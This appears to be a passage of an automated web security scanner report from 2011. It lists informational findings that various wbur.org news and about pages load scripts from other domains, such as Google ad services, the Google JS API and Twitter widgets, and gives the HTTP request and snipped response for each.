HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36946>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:23 GMT
Connection: close
Content-Length: 46721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/adl-anti-semitism-on-the-rise" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.9. http://www.wbur.org/2011/10/05/attleboro-councilor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/attleboro-councilor

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/attleboro-councilor HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36962>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:24 GMT
Connection: close
Content-Length: 48307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/attleboro-councilor" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.10. http://www.wbur.org/2011/10/05/democrats-debate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/democrats-debate

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/democrats-debate HTTP/1.1
Host: www.wbur.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.wbur.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36934>; rel=shortlink
Date: Wed, 05 Oct 2011 18:00:01 GMT
Content-Length: 55144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/democrats-debate" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.11. http://www.wbur.org/2011/10/05/dui-charges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/dui-charges

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/dui-charges HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36935>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:21 GMT
Connection: close
Content-Length: 48094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/dui-charges" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.12. http://www.wbur.org/2011/10/05/friendlys-closing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/friendlys-closing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/friendlys-closing HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36952>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:22 GMT
Connection: close
Content-Length: 51111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/friendlys-closing" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.13. http://www.wbur.org/2011/10/05/north-shore-flooding  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/north-shore-flooding

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/north-shore-flooding HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36936>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:22 GMT
Connection: close
Content-Length: 46576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/north-shore-flooding" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.14. http://www.wbur.org/2011/10/05/state-reserves  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/state-reserves

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/state-reserves HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36945>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:25 GMT
Connection: close
Content-Length: 48149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/05/state-reserves" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.15. http://www.wbur.org/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:37 GMT
Connection: close
Content-Length: 40588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.16. http://www.wbur.org/about/2011-schorr-prize  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/2011-schorr-prize

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/2011-schorr-prize HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:43 GMT
Connection: close
Content-Length: 40057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.17. http://www.wbur.org/about/directions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/directions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/directions HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:40 GMT
Connection: close
Content-Length: 45147


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
   <script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...
</style>

<script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.18. http://www.wbur.org/about/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/jobs HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:41 GMT
Connection: close
Content-Length: 34737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.19. http://www.wbur.org/about/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/privacy HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:41 GMT
Connection: close
Content-Length: 34168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.20. http://www.wbur.org/about/reporting-copyright-infringement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/reporting-copyright-infringement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/reporting-copyright-infringement HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:42 GMT
Connection: close
Content-Length: 37436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.21. http://www.wbur.org/arts-calendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /arts-calendar

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /arts-calendar HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:32 GMT
Connection: close
Content-Length: 31997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.22. http://www.wbur.org/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:36 GMT
Connection: close
Content-Length: 31620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.23. http://www.wbur.org/community/rules  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /community/rules

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/rules HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:47 GMT
Connection: close
Content-Length: 36256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.24. http://www.wbur.org/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /contact

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:39 GMT
Connection: close
Content-Length: 34582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.25. http://www.wbur.org/content/news/arts-culture  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/arts-culture

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/arts-culture HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:53 GMT
Connection: close
Content-Length: 89484

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.26. http://www.wbur.org/content/news/boston  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/boston

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/boston HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:42 GMT
Connection: close
Content-Length: 52343

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.27. http://www.wbur.org/content/news/economy-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/economy-business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/economy-business HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:49 GMT
Connection: close
Content-Length: 83031

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.28. http://www.wbur.org/content/news/health  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/health

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/health HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:51 GMT
Connection: close
Content-Length: 82190

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

